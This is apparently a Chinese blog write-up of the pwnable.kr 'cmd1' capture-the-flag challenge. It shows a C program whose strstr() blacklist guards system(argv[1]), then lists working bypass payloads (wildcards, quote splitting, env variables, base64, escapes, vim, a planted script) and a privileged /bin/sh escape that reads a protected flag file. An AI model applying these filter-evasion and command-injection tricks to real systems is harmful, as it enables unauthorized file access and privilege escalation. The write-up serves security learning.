【pwnable.kr】cmd1 - putenv() strstr() bypass

版权声明：本文为博主原创文章，未经博主允许不得转载。 https://blog.csdn.net/think_ycx/article/details/82989438

cmd1 - 1 pt

Mommy! what is PATH environment in Linux?

ssh [email protected] -p2222 (pw:guest)

登陆服务器之后，cmd1有cmd1_pwn的group权限，可以读flag。

cmd1@ubuntu:~$ ls -l
total 20
-r-xr-sr-x 1 root cmd1_pwn 8513 Jul 14  2015 cmd1
-rw-r--r-- 1 root root      320 Mar 23  2018 cmd1.c
-r--r----- 1 root cmd1_pwn   48 Jul 14  2015 flag

本关的代码量不是很大，直接看源码吧。

#include <stdio.h>
#include <string.h>

int filter(char* cmd){
	int r=0;
	r += strstr(cmd, "flag")!=0;
	r += strstr(cmd, "sh")!=0;
	r += strstr(cmd, "tmp")!=0;
	return r;
}
int main(int argc, char* argv[], char** envp){
	putenv("PATH=/thankyouverymuch");
	if(filter(argv[1])) return 0;
	system( argv[1] );
	return 0;
}

给r复制时的反汇编如下：

call    _strstr        
test    rax, rax      ;// 判断返回值是否为，影响ZF标志位
setnz   al		      ;// set if not zero，如果ZF为1，al为0。如果ZF为1，al为1。
movzx   eax, al       ;// 16位扩展为32位，movzx无符号扩展。movsx为有符号扩展
add     [rbp+var_4], eax   ;// 修改r的值

strstr是Standard C Library中的函数，看一下实现。

SYNOPSIS
     #include <string.h>
	 
     char * strstr(const char *haystack, const char *needle);
     
DESCRIPTION
     The strstr() function locates the first occurrence of the null-terminated string needle in the null-terminated string haystack.
     
RETURN VALUES
     If needle is an empty string, haystack is returned; if needle occurs nowhere in haystack,NULL is returned; otherwise a pointer to the first character of the first occurrence of needle is returned.

如果needle为空字符串，strstr返回haystack。如果needle没有出现，返回NULL。否则返回第一次匹配到的子串。

本关调用putenv修改了环境变量PATH,因此原先的命令需要用绝对路径去运行，或者export PATH恢复再使用。此外，filter了argv[1]，不能出现flag sh tmp这些字符串。最后调用system执行。本关很明显是要让我们找一些bypass方案了。

flag

总结了一下目前的拿flag姿势。

# 通配符  cat fla* 可以读flag
cmd1@ubuntu:~$ ./cmd1 /b"in/cat /home/cmd1/fla*"
mommy now I get what PATH environment is for :)

# 字符串拼接 'f'la'g' 在bash中还是flag
cmd1@ubuntu:~$ echo 'f'la'g'
flag
cmd1@ubuntu:~$ ./cmd1 "/bin/cat /home/cmd1/'f'lag"
mommy now I get what PATH environment is for :)
cmd1@ubuntu:~$ echo 'f'lag
flag
cmd1@ubuntu:~$ echo "f"lag
flag
cmd1@ubuntu:~$ ./cmd1 "/bin/cat /home/cmd1/\"f\"lag"
mommy now I get what PATH environment is for :)

# env设置环境变量拿flag
cmd1@ubuntu:~$ env x='/bin/cat /home/cmd1/flag' ./cmd1 "\$x"
mommy now I get what PATH environment is for :)

#借助vim来打开文件
./cmd1 /usr/bin/vim
:e flag

# 转义一个不需要转义的字符 如\a
cmd1@ubuntu:~$ ./cmd1 "/bin/cat fl\ag"
mommy now I get what PATH environment is for :)

# base64 decode
cmd1@ubuntu:~$ ./cmd1 '/bin/cat $(echo "ZmxhZwo=" | /usr/bin/base64 -d)'
mommy now I get what PATH environment is for :)

# 直接写bash，简单粗暴 by v4r4n
cmd1@ubuntu:~$ echo /bin/cat /home/cmd1/flag > /var/lib/php/sessions/asd
cmd1@ubuntu:~$ chmod +x /var/lib/php/sessions/asd
cmd1@ubuntu:~$ ./cmd1 /var/lib/php/sessions/asd
mommy now I get what PATH environment is for :)

# more 查看当前目录下所有文件
./cmd1 "/bin/more *"
...

也有一个不太理解的。/bin/sh有cmd1_pwn权限，/bin/bash没有。

cmd1@ubuntu:~$ ./cmd1 "/bin/bas''h"
bash-4.3$ /usr/bin/id
uid=1025(cmd1) gid=1025(cmd1) groups=1025(cmd1)
bash-4.3$ exit
exit
cmd1@ubuntu:~$ ./cmd1 "/bin/s''h"
$ /usr/bin/id
uid=1025(cmd1) gid=1025(cmd1) egid=1026(cmd1_pwn) groups=1026(cmd1_pwn),1025(cmd1)
$ /bin/cat flag
mommy now I get what PATH environment is for :)